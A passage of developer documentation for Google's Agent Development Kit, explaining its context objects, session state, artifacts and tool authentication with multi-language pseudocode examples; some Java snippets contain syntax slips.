userMsg); System.out.print("\nAgent > "); events.blockingForEach(event -> System.out.print(event.stringifyContent())); } protected Flowable runAsyncImpl(InvocationContext invocationContext) { // Direct access example String agentName = invocationContext.agent.name String sessionId = invocationContext.session.id String invocationId = invocationContext.invocationId System.out.println("Agent " + agent_name + " running in session " + session_id + " for invocation " + invocationId) // ... agent logic using ctx ... } ``` 1. **`ReadonlyContext`** - **Where Used:** Provided in scenarios where only read access to basic information is needed and mutation is disallowed (e.g., `InstructionProvider` functions). It's also the base class for other contexts. - **Purpose:** Offers a safe, read-only view of fundamental contextual details. - **Key Contents:** `invocation_id`, `agent_name`, and a read-only *view* of the current `state`. ```python # Pseudocode: Instruction provider receiving ReadonlyContext from google.adk.agents.readonly_context import ReadonlyContext def my_instruction_provider(context: ReadonlyContext) -> str: # Read-only access example user_tier = context.state().get("user_tier", "standard") # Can read state # context.state['new_key'] = 'value' # This would typically cause an error or be ineffective return f"Process the request for a {user_tier} user." ``` ```typescript // Pseudocode: Instruction provider receiving ReadonlyContext import { ReadonlyContext } from '@google/adk'; function myInstructionProvider(context: ReadonlyContext): string { // Read-only access example // The state object is read-only const userTier = context.state.get('user_tier') ?? 'standard'; // context.state.set('new_key', 'value'); // This would fail or throw an error return `Process the request for a ${userTier} user.`; } ``` ```go import "google.golang.org/adk/agent" // Pseudocode: Instruction provider receiving ReadonlyContext func myInstructionProvider(ctx agent.ReadonlyContext) (string, error) { // Read-only access example userTier, err := ctx.ReadonlyState().Get("user_tier") if err != nil { userTier = "standard" // Default value } // ctx.ReadonlyState() has no Set method since State() is read-only. return fmt.Sprintf("Process the request for a %v user.", userTier), nil } ``` ```java // Pseudocode: Instruction provider receiving ReadonlyContext import com.google.adk.agents.ReadonlyContext; public String myInstructionProvider(ReadonlyContext context){ // Read-only access example String userTier = context.state().get("user_tier", "standard"); context.state().put('new_key', 'value'); //This would typically cause an error return "Process the request for a " + userTier + " user." } ``` 1. **`CallbackContext`** - **Where Used:** Passed as `callback_context` to agent lifecycle callbacks (`before_agent_callback`, `after_agent_callback`) and model interaction callbacks (`before_model_callback`, `after_model_callback`). - **Purpose:** Facilitates inspecting and modifying state, interacting with artifacts, and accessing invocation details *specifically within callbacks*. - **Key Capabilities (Adds to `ReadonlyContext`):** - **Mutable `state` Property:** Allows reading *and writing* to session state. Changes made here (`callback_context.state['key'] = value`) are tracked and associated with the event generated by the framework after the callback. - **Artifact Methods:** `load_artifact(filename)` and `save_artifact(filename, part)` methods for interacting with the configured `artifact_service`. - Direct `user_content` access. ```python # Pseudocode: Callback receiving CallbackContext from google.adk.agents.callback_context import CallbackContext from google.adk.models import LlmRequest from google.genai import types from typing import Optional def my_before_model_cb(callback_context: CallbackContext, request: LlmRequest) -> Optional[types.Content]: # Read/Write state example call_count = callback_context.state.get("model_calls", 0) callback_context.state["model_calls"] = call_count + 1 # Modify state # Optionally load an artifact # config_part = callback_context.load_artifact("model_config.json") print(f"Preparing model call #{call_count + 1} for invocation {callback_context.invocation_id}") return None # Allow model call to proceed ``` ```typescript // Pseudocode: Callback receiving CallbackContext import { CallbackContext, LlmRequest } from '@google/adk'; import { Content } from '@google/genai'; function myBeforeModelCb(callbackContext: CallbackContext, request: LlmRequest): Content | undefined { // Read/Write state example const callCount = (callbackContext.state.get('model_calls') as number) || 0; callbackContext.state.set('model_calls', callCount + 1); // Modify state // Optionally load an artifact // const configPart = await callbackContext.loadArtifact('model_config.json'); console.log(`Preparing model call #${callCount + 1} for invocation ${callbackContext.invocationId}`); return undefined; // Allow model call to proceed } ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/model" ) // Pseudocode: Callback receiving CallbackContext func myBeforeModelCb(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { // Read/Write state example callCount, err := ctx.State().Get("model_calls") if err != nil { callCount = 0 // Default value } newCount := callCount.(int) + 1 if err := ctx.State().Set("model_calls", newCount); err != nil { return nil, err } // Optionally load an artifact // configPart, err := ctx.Artifacts().Load("model_config.json") fmt.Printf("Preparing model call #%d for invocation %s\n", newCount, ctx.InvocationID()) return nil, nil // Allow model call to proceed } ``` ```java // Pseudocode: Callback receiving CallbackContext import com.google.adk.agents.CallbackContext; import com.google.adk.models.LlmRequest; import com.google.genai.types.Content; import java.util.Optional; public Maybe myBeforeModelCb(CallbackContext callbackContext, LlmRequest request){ // Read/Write state example callCount = callbackContext.state().get("model_calls", 0) callbackContext.state().put("model_calls") = callCount + 1 # Modify state // Optionally load an artifact // Maybe configPart = callbackContext.loadArtifact("model_config.json"); System.out.println("Preparing model call " + callCount + 1); return Maybe.empty(); // Allow model call to proceed } ``` 1. **`ToolContext`** - **Where Used:** Passed as `tool_context` to the functions backing `FunctionTool`s and to tool execution callbacks (`before_tool_callback`, `after_tool_callback`). - **Purpose:** Provides everything `CallbackContext` does, plus specialized methods essential for tool execution, like handling authentication, searching memory, and listing artifacts. - **Key Capabilities (Adds to `CallbackContext`):** - **Authentication Methods:** `request_credential(auth_config)` to trigger an auth flow, and `get_auth_response(auth_config)` to retrieve credentials provided by the user/system. - **Artifact Listing:** `list_artifacts()` to discover available artifacts in the session. - **Memory Search:** `search_memory(query)` to query the configured `memory_service`. - **`function_call_id` Property:** Identifies the specific function call from the LLM that triggered this tool execution, crucial for linking authentication requests or responses back correctly. - **`actions` Property:** Direct access to the `EventActions` object for this step, allowing the tool to signal state changes, auth requests, etc. ```python # Pseudocode: Tool function receiving ToolContext from google.adk.tools import ToolContext from typing import Dict, Any # Assume this function is wrapped by a FunctionTool def search_external_api(query: str, tool_context: ToolContext) -> Dict[str, Any]: api_key = tool_context.state.get("api_key") if not api_key: # Define required auth config # auth_config = AuthConfig(...) # tool_context.request_credential(auth_config) # Request credentials # Use the 'actions' property to signal the auth request has been made # tool_context.actions.requested_auth_configs[tool_context.function_call_id] = auth_config return {"status": "Auth Required"} # Use the API key... print(f"Tool executing for query '{query}' using API key. Invocation: {tool_context.invocation_id}") # Optionally search memory or list artifacts # relevant_docs = tool_context.search_memory(f"info related to {query}") # available_files = tool_context.list_artifacts() return {"result": f"Data for {query} fetched."} ``` ```typescript // Pseudocode: Tool function receiving ToolContext import { ToolContext } from '@google/adk'; // __Assume this function is wrapped by a FunctionTool__ function searchExternalApi(query: string, toolContext: ToolContext): { [key: string]: string } { const apiKey = toolContext.state.get('api_key') as string; if (!apiKey) { // Define required auth config // const authConfig = new AuthConfig(...); // toolContext.requestCredential(authConfig); // Request credentials // The 'actions' property is now automatically updated by requestCredential return { status: 'Auth Required' }; } // Use the API key... console.log(`Tool executing for query '${query}' using API key. Invocation: ${toolContext.invocationId}`); // Optionally search memory or list artifacts // Note: accessing services like memory/artifacts is typically async in TS, // so you would need to mark this function 'async' if you reused them. // toolContext.searchMemory(`info related to ${query}`).then(...) // toolContext.listArtifacts().then(...) return { result: `Data for ${query} fetched.` }; } ``` ```go import "google.golang.org/adk/tool" // Pseudocode: Tool function receiving ToolContext type searchExternalAPIArgs struct { Query string `json:"query" jsonschema:"The query to search for."` } func searchExternalAPI(tc tool.Context, input searchExternalAPIArgs) (string, error) { apiKey, err := tc.State().Get("api_key") if err != nil || apiKey == "" { // In a real scenario, you would define and request credentials here. // This is a conceptual placeholder. return "", fmt.Errorf("auth required") } // Use the API key... fmt.Printf("Tool executing for query '%s' using API key. Invocation: %s\n", input.Query, tc.InvocationID()) // Optionally search memory or list artifacts // relevantDocs, _ := tc.SearchMemory(tc, "info related to %s", input.Query)) // availableFiles, _ := tc.Artifacts().List() return fmt.Sprintf("Data for %s fetched.", input.Query), nil } ``` ```java // Pseudocode: Tool function receiving ToolContext import com.google.adk.tools.ToolContext; import java.util.HashMap; import java.util.Map; // Assume this function is wrapped by a FunctionTool public Map searchExternalApi(String query, ToolContext toolContext){ String apiKey = toolContext.state.get("api_key"); if(apiKey.isEmpty()){ // Define required auth config // authConfig = AuthConfig(...); // toolContext.requestCredential(authConfig); # Request credentials // Use the 'actions' property to signal the auth request has been made ... return Map.of("status", "Auth Required"); // Use the API key... System.out.println("Tool executing for query " + query + " using API key. "); // Optionally list artifacts // Single> availableFiles = toolContext.listArtifacts(); return Map.of("result", "Data for " + query + " fetched"); } ``` Understanding these different context objects and when to use them is key to effectively managing state, accessing services, and controlling the flow of your ADK application. The next section will detail common tasks you can perform using these contexts. ## Common Tasks Using Context Now that you understand the different context objects, let's focus on how to use them for common tasks when building your agents and tools. ### Accessing Information You'll frequently need to read information stored within the context. - **Reading Session State:** Access data saved in previous steps or user/app-level settings. Use dictionary-like access on the `state` property. ```python # Pseudocode: In a Tool function from google.adk.tools import ToolContext def my_tool(tool_context: ToolContext, **kwargs): user_pref = tool_context.state.get("user_display_preference", "default_mode") api_endpoint = tool_context.state.get("app:api_endpoint") # Read app-level state if user_pref == "dark_mode": # ... apply dark mode logic ... pass print(f"Using API endpoint: {api_endpoint}") # ... rest of tool logic ... # Pseudocode: In a Callback function from google.adk.agents.callback_context import CallbackContext def my_callback(callback_context: CallbackContext, **kwargs): last_tool_result = callback_context.state.get("temp:last_api_result") # Read temporary state if last_tool_result: print(f"Found temporary result from last tool: {last_tool_result}") # ... callback logic ... ``` ```typescript // Pseudocode: In a Tool function import { ToolContext } from '@google/adk'; async function myTool(toolContext: ToolContext) { const userPref = toolContext.state.get('user_display_preference', 'default_mode'); const apiEndpoint = toolContext.state.get('app:api_endpoint'); // Read app-level state if (userPref === 'dark_mode') { // ... apply dark mode logic ... } console.log(`Using API endpoint: ${apiEndpoint}`); // ... rest of tool logic ... } // Pseudocode: In a Callback function import { CallbackContext } from '@google/adk'; function myCallback(callbackContext: CallbackContext) { const lastToolResult = callbackContext.state.get('temp:last_api_result'); // Read temporary state if (lastToolResult) { console.log(`Found temporary result from last tool: ${lastToolResult}`); } // ... callback logic ... } ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/genai" ) // Pseudocode: In a Tool function type toolArgs struct { // Define tool-specific arguments here } type toolResults struct { // Define tool-specific results here } // Example tool function demonstrating state access func myTool(tc tool.Context, input toolArgs) (toolResults, error) { userPref, err := tc.State().Get("user_display_preference") if err != nil { userPref = "default_mode" } apiEndpoint, _ := tc.State().Get("app:api_endpoint") // Read app-level state if userPref == "dark_mode" { // ... apply dark mode logic ... } fmt.Printf("Using API endpoint: %v\n", apiEndpoint) // ... rest of tool logic ... return toolResults{}, nil } // Pseudocode: In a Callback function func myCallback(ctx agent.CallbackContext) (*genai.Content, error) { lastToolResult, err := ctx.State().Get("temp:last_api_result") // Read temporary state if err == nil { fmt.Printf("Found temporary result from last tool: %v\n", lastToolResult) } else { fmt.Println("No temporary result found.") } // ... callback logic ... return nil, nil } ``` ```java // Pseudocode: In a Tool function import com.google.adk.tools.ToolContext; public void myTool(ToolContext toolContext){ String userPref = toolContext.state().get("user_display_preference"); String apiEndpoint = toolContext.state().get("app:api_endpoint"); // Read app-level state if(userPref.equals("dark_mode")){ // ... apply dark mode logic ... pass } System.out.println("Using API endpoint: " + api_endpoint); // ... rest of tool logic ... } // Pseudocode: In a Callback function import com.google.adk.agents.CallbackContext; public void myCallback(CallbackContext callbackContext){ String lastToolResult = (String) callbackContext.state().get("temp:last_api_result"); // Read temporary state } if(!(lastToolResult.isEmpty())){ System.out.println("Found temporary result from last tool: " + lastToolResult); } // ... callback logic ... ``` - **Getting Current Identifiers:** Useful for logging or custom logic based on the current operation. ```python # Pseudocode: In any context (ToolContext shown) from google.adk.tools import ToolContext def log_tool_usage(tool_context: ToolContext, **kwargs): agent_name = tool_context.agent_name inv_id = tool_context.invocation_id func_call_id = getattr(tool_context, 'function_call_id', 'N/A') # Specific to ToolContext print(f"Log: Invocation={inv_id}, Agent={agent_name}, FunctionCallID={func_call_id} - Tool Executed.") ``` ```typescript // Pseudocode: In any context (ToolContext shown) import { ToolContext } from '@google/adk'; function logToolUsage(toolContext: ToolContext) { const agentName = toolContext.agentName; const invId = toolContext.invocationId; const functionCallId = toolContext.functionCallId ?? 'N/A'; // Specific to ToolContext console.log(`Log: Invocation=${invId}, Agent=${agentName}, FunctionCallID=${functionCallId} - Tool Executed.`); } ``` ```go import "google.golang.org/adk/tool" // Pseudocode: In any context (ToolContext shown) type logToolUsageArgs struct{} type logToolUsageResult struct { Status string `json:"status"` } func logToolUsage(tc tool.Context, args logToolUsageArgs) (logToolUsageResult, error) { agentName := tc.AgentName() invID := tc.InvocationID() funcCallID := tc.FunctionCallID() fmt.Printf("Log: Invocation=%s, Agent=%s, FunctionCallID=%s - Tool Executed.\n", invID, agentName, funcCallID) return logToolUsageResult{Status: "Logged successfully"}, nil } ``` ```java // Pseudocode: In any context (ToolContext shown) import com.google.adk.tools.ToolContext; public void logToolUsage(ToolContext toolContext){ String agentName = toolContext.agentName; String invId = toolContext.invocationId; String functionCallId = toolContext.functionCallId().get(); // Specific to ToolContext System.out.println("Log: Invocation= " + invId &+ " Agent= " + agentName); } ``` - **Accessing the Initial User Input:** Refer back to the message that started the current invocation. ```python # Pseudocode: In a Callback from google.adk.agents.callback_context import CallbackContext def check_initial_intent(callback_context: CallbackContext, **kwargs): initial_text = "N/A" if callback_context.user_content and callback_context.user_content.parts: initial_text = callback_context.user_content.parts[0].text or "Non-text input" print(f"This invocation started with user input: '{initial_text}'") # Pseudocode: In an Agent's _run_async_impl # async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]: # if ctx.user_content and ctx.user_content.parts: # initial_text = ctx.user_content.parts[0].text # print(f"Agent logic remembering initial query: {initial_text}") # ... ``` ```typescript // Pseudocode: In a Callback import { CallbackContext } from '@google/adk'; function checkInitialIntent(callbackContext: CallbackContext) { let initialText = 'N/A'; const userContent = callbackContext.userContent; if (userContent?.parts?.length) { initialText = userContent.parts[0].text ?? 'Non-text input'; } console.log(`This invocation started with user input: '${initialText}'`); } ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/genai" ) // Pseudocode: In a Callback func logInitialUserInput(ctx agent.CallbackContext) (*genai.Content, error) { userContent := ctx.UserContent() if userContent != nil && len(userContent.Parts) > 0 { if text := userContent.Parts[0].Text; text != "" { fmt.Printf("User's initial input for this turn: '%s'\n", text) } } return nil, nil // No modification } ``` ```java // Pseudocode: In a Callback import com.google.adk.agents.CallbackContext; public void checkInitialIntent(CallbackContext callbackContext){ String initialText = "N/A"; if((!(callbackContext.userContent().isEmpty())) && (!(callbackContext.userContent().parts.isEmpty()))){ initialText = cbx.userContent().get().parts().get().get(0).text().get(); ... System.out.println("This invocation started with user input: " + initialText) } } ``` ### Managing State State is crucial for memory and data flow. When you modify state using `CallbackContext` or `ToolContext`, the changes are automatically tracked and persisted by the framework. - **How it Works:** Writing to `callback_context.state['my_key'] = my_value` or `tool_context.state['my_key'] = my_value` adds this change to the `EventActions.state_delta` associated with the current step's event. The `SessionService` then applies these deltas when persisting the event. - **Passing Data Between Tools** ```python # Pseudocode: Tool 1 - Fetches user ID from google.adk.tools import ToolContext import uuid def get_user_profile(tool_context: ToolContext) -> dict: user_id = str(uuid.uuid4()) # Simulate fetching ID # Save the ID to state for the next tool tool_context.state["temp:current_user_id"] = user_id return {"profile_status": "ID generated"} # Pseudocode: Tool 2 - Uses user ID from state def get_user_orders(tool_context: ToolContext) -> dict: user_id = tool_context.state.get("temp:current_user_id") if not user_id: return {"error": "User ID not found in state"} print(f"Fetching orders for user ID: {user_id}") # ... logic to fetch orders using user_id ... return {"orders": ["order123", "order456"]} ``` ```typescript // Pseudocode: Tool 1 - Fetches user ID import { ToolContext } from '@google/adk'; import { v4 as uuidv4 } from 'uuid'; function getUserProfile(toolContext: ToolContext): Record { const userId = uuidv4(); // Simulate fetching ID // Save the ID to state for the next tool toolContext.state.set('temp:current_user_id', userId); return { profile_status: 'ID generated' }; } // Pseudocode: Tool 2 - Uses user ID from state function getUserOrders(toolContext: ToolContext): Record { const userId = toolContext.state.get('temp:current_user_id'); if (!userId) { return { error: 'User ID not found in state' }; } console.log(`Fetching orders for user ID: ${userId}`); // ... logic to fetch orders using user_id ... return { orders: ['order123', 'order456'] }; } ``` ```go import "google.golang.org/adk/tool" // Pseudocode: Tool 1 - Fetches user ID type GetUserProfileArgs struct { } func getUserProfile(tc tool.Context, input GetUserProfileArgs) (string, error) { // A random user ID for demonstration purposes userID := "random_user_456" // Save the ID to state for the next tool if err := tc.State().Set("temp:current_user_id", userID); err != nil { return "", fmt.Errorf("failed to set user ID in state: %w", err) } return "ID generated", nil } // Pseudocode: Tool 2 - Uses user ID from state type GetUserOrdersArgs struct { } type getUserOrdersResult struct { Orders []string `json:"orders"` } func getUserOrders(tc tool.Context, input GetUserOrdersArgs) (*getUserOrdersResult, error) { userID, err := tc.State().Get("temp:current_user_id") if err != nil { return &getUserOrdersResult{}, fmt.Errorf("user ID not found in state") } fmt.Printf("Fetching orders for user ID: %v\n", userID) // ... logic to fetch orders using user_id ... return &getUserOrdersResult{Orders: []string{"order123", "order456"}}, nil } ``` ```java // Pseudocode: Tool 1 - Fetches user ID import com.google.adk.tools.ToolContext; import java.util.UUID; public Map getUserProfile(ToolContext toolContext){ String userId = UUID.randomUUID().toString(); // Save the ID to state for the next tool toolContext.state().put("temp:current_user_id", user_id); return Map.of("profile_status", "ID generated"); } // Pseudocode: Tool 2 - Uses user ID from state public Map getUserOrders(ToolContext toolContext){ String userId = toolContext.state().get("temp:current_user_id"); if(userId.isEmpty()){ return Map.of("error", "User ID not found in state"); } System.out.println("Fetching orders for user id: " + userId); // ... logic to fetch orders using user_id ... return Map.of("orders", "order123"); } ``` - **Updating User Preferences:** ```python # Pseudocode: Tool or Callback identifies a preference from google.adk.tools import ToolContext # Or CallbackContext def set_user_preference(tool_context: ToolContext, preference: str, value: str) -> dict: # Use 'user:' prefix for user-level state (if using a persistent SessionService) state_key = f"user:{preference}" tool_context.state[state_key] = value print(f"Set user preference '{preference}' to '{value}'") return {"status": "Preference updated"} ``` ```typescript // Pseudocode: Tool or Callback identifies a preference import { ToolContext } from '@google/adk'; // Or CallbackContext function setUserPreference(toolContext: ToolContext, preference: string, value: string): Record { // Use 'user:' prefix for user-level state (if using a persistent SessionService) const stateKey = `user:${preference}`; toolContext.state.set(stateKey, value); console.log(`Set user preference '${preference}' to '${value}'`); return { status: 'Preference updated' }; } ``` ```go import "google.golang.org/adk/tool" // Pseudocode: Tool or Callback identifies a preference type setUserPreferenceArgs struct { Preference string `json:"preference" jsonschema:"The name of the preference to set."` Value string `json:"value" jsonschema:"The value to set for the preference."` } type setUserPreferenceResult struct { Status string `json:"status"` } func setUserPreference(tc tool.Context, args setUserPreferenceArgs) (setUserPreferenceResult, error) { // Use 'user:' prefix for user-level state (if using a persistent SessionService) stateKey := fmt.Sprintf("user:%s", args.Preference) if err := tc.State().Set(stateKey, args.Value); err != nil { return setUserPreferenceResult{}, fmt.Errorf("failed to set preference in state: %w", err) } fmt.Printf("Set user preference '%s' to '%s'\n", args.Preference, args.Value) return setUserPreferenceResult{Status: "Preference updated"}, nil } ``` ```java // Pseudocode: Tool or Callback identifies a preference import com.google.adk.tools.ToolContext; // Or CallbackContext public Map setUserPreference(ToolContext toolContext, String preference, String value){ // Use 'user:' prefix for user-level state (if using a persistent SessionService) String stateKey = "user:" + preference; toolContext.state().put(stateKey, value); System.out.println("Set user preference '" + preference + "' to '" + value + "'"); return Map.of("status", "Preference updated"); } ``` - **State Prefixes:** While basic state is session-specific, prefixes like `app:` and `user:` can be used with persistent `SessionService` implementations (like `DatabaseSessionService` or `VertexAiSessionService`) to indicate broader scope (app-wide or user-wide across sessions). `temp:` can denote data only relevant within the current invocation. ### Working with Artifacts Use artifacts to handle files or large data blobs associated with the session. Common use case: processing uploaded documents. - **Document Summarizer Example Flow:** 1. **Ingest Reference (e.g., in a Setup Tool or Callback):** Save the *path or URI* of the document, not the entire content, as an artifact. ```python # Pseudocode: In a callback or initial tool from google.adk.agents.callback_context import CallbackContext # Or ToolContext from google.genai import types def save_document_reference(context: CallbackContext, file_path: str) -> None: # Assume file_path is something like "gs://my-bucket/docs/report.pdf" or "/local/path/to/report.pdf" try: # Create a Part containing the path/URI text artifact_part = types.Part(text=file_path) version = context.save_artifact("document_to_summarize.txt", artifact_part) print(f"Saved document reference '{file_path}' as artifact version {version}") # Store the filename in state if needed by other tools context.state["temp:doc_artifact_name"] = "document_to_summarize.txt" except ValueError as e: print(f"Error saving artifact: {e}") # E.g., Artifact service not configured except Exception as e: print(f"Unexpected error saving artifact reference: {e}") # Example usage: # save_document_reference(callback_context, "gs://my-bucket/docs/report.pdf") ``` ```typescript // Pseudocode: In a callback or initial tool import { CallbackContext } from '@google/adk'; // Or ToolContext import type { Part } from '@google/genai'; async function saveDocumentReference(context: CallbackContext, filePath: string) { // Assume filePath is something like "gs://my-bucket/docs/report.pdf" or "/local/path/to/report.pdf" try { // Create a Part containing the path/URI text const artifactPart: Part = { text: filePath }; const version = await context.saveArtifact('document_to_summarize.txt', artifactPart); console.log(`Saved document reference '${filePath}' as artifact version ${version}`); // Store the filename in state if needed by other tools context.state.set('temp:doc_artifact_name', 'document_to_summarize.txt'); } catch (e) { console.error(`Unexpected error saving artifact reference: ${e}`); } } // Example usage: // saveDocumentReference(callbackContext, "gs://my-bucket/docs/report.pdf"); ``` ```go import ( "google.golang.org/adk/tool" "google.golang.org/genai" ) // Adapt the saveDocumentReference callback into a tool for this example. type saveDocRefArgs struct { FilePath string `json:"file_path" jsonschema:"The path to the file to save."` } type saveDocRefResult struct { Status string `json:"status"` } func saveDocRef(tc tool.Context, args saveDocRefArgs) (saveDocRefResult, error) { artifactPart := genai.NewPartFromText(args.FilePath) _, err := tc.Artifacts().Save(tc, "document_to_summarize.txt", artifactPart) if err != nil { return saveDocRefResult{}, err } fmt.Printf("Saved document reference '%s' as artifact\n", args.FilePath) if err := tc.State().Set("temp:doc_artifact_name", "document_to_summarize.txt"); err != nil { return saveDocRefResult{}, fmt.Errorf("failed to set artifact name in state") } return saveDocRefResult{"Reference saved"}, nil } ``` ```java // Pseudocode: In a callback or initial tool import com.google.adk.agents.CallbackContext; import com.google.genai.types.Content; import com.google.genai.types.Part; pubic void saveDocumentReference(CallbackContext context, String filePath){ // Assume file_path is something like "gs://my-bucket/docs/report.pdf" or "/local/path/to/report.pdf" try{ // Create a Part containing the path/URI text Part artifactPart = types.Part(filePath) Optional version = context.saveArtifact("document_to_summarize.txt", artifactPart) System.out.println("Saved document reference" + filePath + " as artifact version " + version); // Store the filename in state if needed by other tools context.state().put("temp:doc_artifact_name", "document_to_summarize.txt"); } catch(Exception e){ System.out.println("Unexpected error saving artifact reference: " + e); } } // Example usage: // saveDocumentReference(context, "gs://my-bucket/docs/report.pdf") ``` 1. **Summarizer Tool:** Load the artifact to get the path/URI, read the actual document content using appropriate libraries, summarize, and return the result. ```python # Pseudocode: In the Summarizer tool function from google.adk.tools import ToolContext from google.genai import types # Assume libraries like google.cloud.storage or built-in open are available # Assume a 'summarize_text' function exists # from my_summarizer_lib import summarize_text def summarize_document_tool(tool_context: ToolContext) -> dict: artifact_name = tool_context.state.get("temp:doc_artifact_name") if not artifact_name: return {"error": "Document artifact name not found in state."} try: # 1. Load the artifact part containing the path/URI artifact_part = tool_context.load_artifact(artifact_name) if not artifact_part or not artifact_part.text: return {"error": f"Could not load artifact or artifact has no text path: {artifact_name}"} file_path = artifact_part.text print(f"Loaded document reference: {file_path}") # 2. Read the actual document content (outside ADK context) document_content = "" if file_path.startswith("gs://"): # Example: Use GCS client library to download/read # from google.cloud import storage # client = storage.Client() # blob = storage.Blob.from_string(file_path, client=client) # document_content = blob.download_as_text() # Or bytes depending on format pass # Replace with actual GCS reading logic elif file_path.startswith("/"): # Example: Use local file system with open(file_path, 'r', encoding='utf-8') as f: document_content = f.read() else: return {"error": f"Unsupported file path scheme: {file_path}"} # 3. Summarize the content if not document_content: return {"error": "Failed to read document content."} # summary = summarize_text(document_content) # Call your summarization logic summary = f"Summary of content from {file_path}" # Placeholder return {"summary": summary} except ValueError as e: return {"error": f"Artifact service error: {e}"} except FileNotFoundError: return {"error": f"Local file not found: {file_path}"} # except Exception as e: # Catch specific exceptions for GCS etc. # return {"error": f"Error reading document {file_path}: {e}"} ``` ```typescript // Pseudocode: In the Summarizer tool function import { ToolContext } from '@google/adk'; async function summarizeDocumentTool(toolContext: ToolContext): Promise> { const artifactName = toolContext.state.get('temp:doc_artifact_name') as string; if (!artifactName) { return { error: 'Document artifact name not found in state.' }; } try { // 1. Load the artifact part containing the path/URI const artifactPart = await toolContext.loadArtifact(artifactName); if (!artifactPart?.text) { return { error: `Could not load artifact or artifact has no text path: ${artifactName}` }; } const filePath = artifactPart.text; console.log(`Loaded document reference: ${filePath}`); // 2. Read the actual document content (outside ADK context) let documentContent = ''; if (filePath.startsWith('gs://')) { // Example: Use GCS client library to download/read // const storage = new Storage(); // const bucket = storage.bucket('my-bucket'); // const file = bucket.file(filePath.replace('gs://my-bucket/', '')); // const [contents] = await file.download(); // documentContent = contents.toString(); } else if (filePath.startsWith('/')) { // Example: Use local file system // import { readFile } from 'fs/promises'; // documentContent = await readFile(filePath, 'utf8'); } else { return { error: `Unsupported file path scheme: ${filePath}` }; } // 3. Summarize the content if (!documentContent) { return { error: 'Failed to read document content.' }; } // const summary = summarizeText(documentContent); // Call your summarization logic const summary = `Summary of content from ${filePath}`; // Placeholder return { summary }; } catch (e) { return { error: `Error processing artifact: ${e}` }; } } ``` ```go import "google.golang.org/adk/tool" // Pseudocode: In the Summarizer tool function type summarizeDocumentArgs struct{} type summarizeDocumentResult struct { Summary string `json:"summary"` } func summarizeDocumentTool(tc tool.Context, input summarizeDocumentArgs) (summarizeDocumentResult, error) { artifactName, err := tc.State().Get("temp:doc_artifact_name") if err != nil { return summarizeDocumentResult{}, fmt.Errorf("No document artifact name found in state") } // 1. Load the artifact part containing the path/URI artifactPart, err := tc.Artifacts().Load(tc, artifactName.(string)) if err != nil { return summarizeDocumentResult{}, err } if artifactPart.Part.Text == "" { return summarizeDocumentResult{}, fmt.Errorf("Could not load artifact or artifact has no text path.") } filePath := artifactPart.Part.Text fmt.Printf("Loaded document reference: %s\n", filePath) // 2. Read the actual document content (outside ADK context) // In a real implementation, you would use a GCS client or local file reader. documentContent := "This is the fake content of the document at " + filePath _ = documentContent // Avoid unused variable error. // 3. Summarize the content summary := "Summary of content from " + filePath // Placeholder return summarizeDocumentResult{Summary: summary}, nil } ``` ```java // Pseudocode: In the Summarizer tool function import com.google.adk.tools.ToolContext; import com.google.genai.types.Content; import com.google.genai.types.Part; public Map summarizeDocumentTool(ToolContext toolContext){ String artifactName = toolContext.state().get("temp:doc_artifact_name"); if(artifactName.isEmpty()){ return Map.of("error", "Document artifact name not found in state."); } try{ // 1. Load the artifact part containing the path/URI Maybe artifactPart = toolContext.loadArtifact(artifactName); if((artifactPart == null) || (artifactPart.text().isEmpty())){ return Map.of("error", "Could not load artifact or artifact has no text path: " + artifactName); } filePath = artifactPart.text(); System.out.println("Loaded document reference: " + filePath); // 2. Read the actual document content (outside ADK context) String documentContent = ""; if(filePath.startsWith("gs://")){ // Example: Use GCS client library to download/read into documentContent pass; // Replace with actual GCS reading logic } else if(){ // Example: Use local file system to download/read into documentContent } else{ return Map.of("error", "Unsupported file path scheme: " + filePath); } // 3. Summarize the content if(documentContent.isEmpty()){ return Map.of("error", "Failed to read document content."); } // summary = summarizeText(documentContent) // Call your summarization logic summary = "Summary of content from " + filePath; // Placeholder return Map.of("summary", summary); } catch(IllegalArgumentException e){ return Map.of("error", "Artifact service error " + filePath + e); } catch(FileNotFoundException e){ return Map.of("error", "Local file not found " + filePath + e); } catch(Exception e){ return Map.of("error", "Error reading document " + filePath + e); } } ``` - **Listing Artifacts:** Discover what files are available. ```python # Pseudocode: In a tool function from google.adk.tools import ToolContext def check_available_docs(tool_context: ToolContext) -> dict: try: artifact_keys = tool_context.list_artifacts() print(f"Available artifacts: {artifact_keys}") return {"available_docs": artifact_keys} except ValueError as e: return {"error": f"Artifact service error: {e}"} ``` ```typescript // Pseudocode: In a tool function import { ToolContext } from '@google/adk'; async function checkAvailableDocs(toolContext: ToolContext): Promise> { try { const artifactKeys = await toolContext.listArtifacts(); console.log(`Available artifacts: ${artifactKeys}`); return { available_docs: artifactKeys }; } catch (e) { return { error: `Artifact service error: ${e}` }; } } ``` ```go import "google.golang.org/adk/tool" // Pseudocode: In a tool function type checkAvailableDocsArgs struct{} type checkAvailableDocsResult struct { AvailableDocs []string `json:"available_docs"` } func checkAvailableDocs(tc tool.Context, args checkAvailableDocsArgs) (checkAvailableDocsResult, error) { artifactKeys, err := tc.Artifacts().List(tc) if err != nil { return checkAvailableDocsResult{}, err } fmt.Printf("Available artifacts: %v\n", artifactKeys) return checkAvailableDocsResult{AvailableDocs: artifactKeys.FileNames}, nil } ``` ```java // Pseudocode: In a tool function import com.google.adk.tools.ToolContext; public Map checkAvailableDocs(ToolContext toolContext){ try{ Single> artifactKeys = toolContext.listArtifacts(); System.out.println("Available artifacts" + artifactKeys.tostring()); return Map.of("availableDocs", "artifactKeys"); } catch(IllegalArgumentException e){ return Map.of("error", "Artifact service error: " + e); } } ``` ### Handling Tool Authentication Supported in ADKPython v0.1.0TypeScript v0.2.0 Securely manage API keys or other credentials needed by tools. ```python # Pseudocode: Tool requiring auth from google.adk.tools import ToolContext from google.adk.auth import AuthConfig # Assume appropriate AuthConfig is defined # Define your required auth configuration (e.g., OAuth, API Key) MY_API_AUTH_CONFIG = AuthConfig(...) AUTH_STATE_KEY = "user:my_api_credential" # Key to store retrieved credential def call_secure_api(tool_context: ToolContext, request_data: str) -> dict: # 1. Check if credential already exists in state credential = tool_context.state.get(AUTH_STATE_KEY) if not 